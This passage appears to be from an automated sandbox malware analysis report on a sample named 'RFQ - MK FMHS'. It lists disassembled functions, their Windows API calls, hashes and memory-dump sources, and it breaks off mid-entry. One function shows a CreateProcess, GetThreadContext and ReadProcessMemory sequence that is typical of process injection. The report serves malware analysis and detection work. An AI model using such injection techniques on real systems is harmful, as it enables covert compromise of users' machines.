                    • Opcode Fuzzy Hash: 0ea99c12abc10b401340319273f148cb9b84611518892e2a2c599459bcf8bf86
                    • Instruction Fuzzy Hash: 9C915F71A10219AFCF04EFA4C8919EDB7F4FF19314F14A46AF815BB291EB31A905CB60
                    Function 00E735B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E735A1,SwapMouseButtons,00000004,?), ref: 00E735D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E735F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E73617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
                    • Instruction ID: ce37d46f2f558ec3cb82ae9276af5ed391c3f23f2a73bded6d88e5f28e311d81
                    • Opcode Fuzzy Hash: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
                    • Instruction Fuzzy Hash: BE114871511218BFDB20CFA5DC40DFEB7B8EF44744F1094A9E809E7210E6719E44A760
                    Function 00E512A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E51A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E51AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E51B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
                    • Instruction ID: 58d40f3099b2c8b781893b615af829f8df99331bbc69af722f341dd2fa98af24
                    • Opcode Fuzzy Hash: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
                    • Instruction Fuzzy Hash: DD621930A14258DBEB24CFA4C841BDEB372EF58301F1095A9D50DFB290E77A9E85CB59
                    Function 00ED97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1
                    • _free.LIBCMT ref: 00ED992C
                    • _free.LIBCMT ref: 00ED9933
                    • _free.LIBCMT ref: 00ED999E
                      • Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
                      • Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB
                    • _free.LIBCMT ref: 00ED99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction ID: 9380df5a4be3717832490c73cf1766dbd14c703021bc052efbc5ce0ef55ad866
                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction Fuzzy Hash: 4B516EB1904218AFDF249F64CC81AAEBBB9EF48310F0054AEB609B7341DB715E81CF58
                    Function 00E9493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: 3f6cac453099906a3919d695f42c9aca0de200aa7605659fdad44d18d272c154
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: 0E41D6B0A006069BDF28CE69C880DAF77A5EF84364B24A17DE855E76D0E7B09D428744
                    Function 00E773E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EAEE62
                    • GetOpenFileNameW.COMDLG32(?), ref: 00EAEEAC
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                      • Part of subcall function 00E909D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
                    • Instruction ID: 51987417e392977333876d3efedd8b7e1782d45b5b5d497c36a25ad85b33d819
                    • Opcode Fuzzy Hash: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
                    • Instruction Fuzzy Hash: CE21C070A042989BCF51DF94D845BEE7BF89F49314F00805AE508FB282DBF859898BA1
                    Function 00ED901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
                    • Instruction ID: 3a7350137429ebed2aa65b9b4f1f7550f88e8a538b3d116c00e33630f62b4fc8
                    • Opcode Fuzzy Hash: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
                    • Instruction Fuzzy Hash: AE01F9728042586EDF29C6A8DC16EEE7BFCDB01301F00419BF552E2181E5B5E6048B60
                    Function 00ED9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00ED9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00ED9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
                    • Instruction ID: 1c36f95b4490c169c795af3b608a84f6bcda3c46b875cd1e5bb7c2f693d5d7de
                    • Opcode Fuzzy Hash: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
                    • Instruction Fuzzy Hash: 45D05B7554030DAFDB10DB94DC0DFA6772CEB44701F0041A1FE54D11B1DDB09598CB91
                    Function 00EECDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
                    • Instruction ID: 603e60de9655a59847c5dea68de5136e313ab3308a1d2b86c05a68a0cd6abd52
                    • Opcode Fuzzy Hash: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
                    • Instruction Fuzzy Hash: 23F15B715083459FC714DF29C880A6ABBE5FF88314F14992EF899AB352D731E946CF82
                    Function 00E7F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401
                      • Part of subcall function 00E86259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E7FA90), ref: 00E862B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E7FB2D
                    • OleInitialize.OLE32(00000000), ref: 00E7FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00EB49F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID:
                    • API String ID: 1986988660-0
                    • Opcode ID: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
                    • Instruction ID: 7e0afae64bde6b127f8b4022bbdc2f0a27f3bd36dce697a08c6d00cef624cc28
                    • Opcode Fuzzy Hash: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
                    • Instruction Fuzzy Hash: D181B8B0D05248EEC784EF2AE9416657BE6FB99338750D13AE419DB362EB318405EF60
                    Function 00E743DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E74401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E744C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
                    • Instruction ID: 1917528aba760e2f02fd0fc493a13c0a00476ace689a94f2e07a438dce167d3a
                    • Opcode Fuzzy Hash: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
                    • Instruction Fuzzy Hash: 533180B05043019FD720DF24D884697BBE8FB49318F00492EE5AAE3291E771A948DB52
                    Function 00E9594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00E95963
                      • Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3D2
                      • Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3DC
                    • __NMSG_WRITE.LIBCMT ref: 00E9596A
                      • Part of subcall function 00E9A408: GetModuleFileNameW.KERNEL32(00000000,00F343BA,00000104,?,00000001,00000000), ref: 00E9A49A
                      • Part of subcall function 00E9A408: ___crtMessageBoxW.LIBCMT ref: 00E9A548
                      • Part of subcall function 00E932DF: ___crtCorExitProcess.LIBCMT ref: 00E932E5
                      • Part of subcall function 00E932DF: ExitProcess.KERNEL32 ref: 00E932EE
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    • RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
                    • Instruction ID: 7accaab88438d093b54602028f8737ff655c65e42b1c16264371e583a97149f3
                    • Opcode Fuzzy Hash: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
                    • Instruction Fuzzy Hash: EE01D233201B15EEFE222B34D842AAE72D98F82738F10202AF525BA191DA70AD018760
                    Function 00ED9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00ED97D2,?,?,?,?,?,00000004), ref: 00ED9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00ED9B5B
                    • CloseHandle.KERNEL32(00000000,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
                    • Instruction ID: 63757f258bacbf4560186655e8884c0c986bde67e84c6ac61fed79335e045e84
                    • Opcode Fuzzy Hash: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
                    • Instruction Fuzzy Hash: 25E02632181214BBD7211F51EC09FDE3B18EF45761F104220FB14780E083B12521C788
                    Function 00ED8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00ED8FA5
                      • Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
                      • Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB
                    • _free.LIBCMT ref: 00ED8FB6
                    • _free.LIBCMT ref: 00ED8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction ID: 6420fe5f7e47bf3503cd94f2d5be047e4d65173d7304b4c8e8cee454473fd42d
                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction Fuzzy Hash: 64E012B17097056ACE24A778AE40A9367EF9F48354B18281EB509FB242DE24F8428124
                    Function 00E7AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: af29a56b8f120bfe56f442afea42ff18cb9ec694bda13d2466edf750fadc3dba
                    • Instruction ID: c61c4ec44b79115a8db56c5ae2e9eec0ba0b5860b55960a5c56e4ffc8c155dd1
                    • Opcode Fuzzy Hash: af29a56b8f120bfe56f442afea42ff18cb9ec694bda13d2466edf750fadc3dba
                    • Instruction Fuzzy Hash: D8224870508341DFCB24DF14C490B6ABBE1FF84304F18996DE99AAB262D731ED85DB82
                    Function 00E74DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: EA06
                    • API String ID: 4104443479-3962188686
                    • Opcode ID: e7787b7dd2dda245afbfa753d02a5feba8cd7d479604eaf6b0dae750541817bf
                    • Instruction ID: 2bcb1e3b5bb36dc67e859af7b3c604b71580c8a3895aef45c712af7fc22358c8
                    • Opcode Fuzzy Hash: e7787b7dd2dda245afbfa753d02a5feba8cd7d479604eaf6b0dae750541817bf
                    • Instruction Fuzzy Hash: 82417FB2A045585BCF115B648C517FE7FE6EB05314F58F065F88ABF2C2C7619D4083A1
                    Function 00E7492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • IsThemeActive.UXTHEME ref: 00E74992
                      • Part of subcall function 00E935AC: __lock.LIBCMT ref: 00E935B2
                      • Part of subcall function 00E935AC: DecodePointer.KERNEL32(00000001,?,00E749A7,00EC81BC), ref: 00E935BE
                      • Part of subcall function 00E935AC: EncodePointer.KERNEL32(?,?,00E749A7,00EC81BC), ref: 00E935C9
                      • Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E74A73
                      • Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E74A88
                      • Part of subcall function 00E73B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
                      • Part of subcall function 00E73B4C: IsDebuggerPresent.KERNEL32 ref: 00E73B8C
                      • Part of subcall function 00E73B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD
                      • Part of subcall function 00E73B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E749D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
                    • Instruction ID: f02aeac7d8ecf21c1fed18b0e66ceb95c5ef6a0467a16c082d4b0b9dd440fd36
                    • Opcode Fuzzy Hash: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
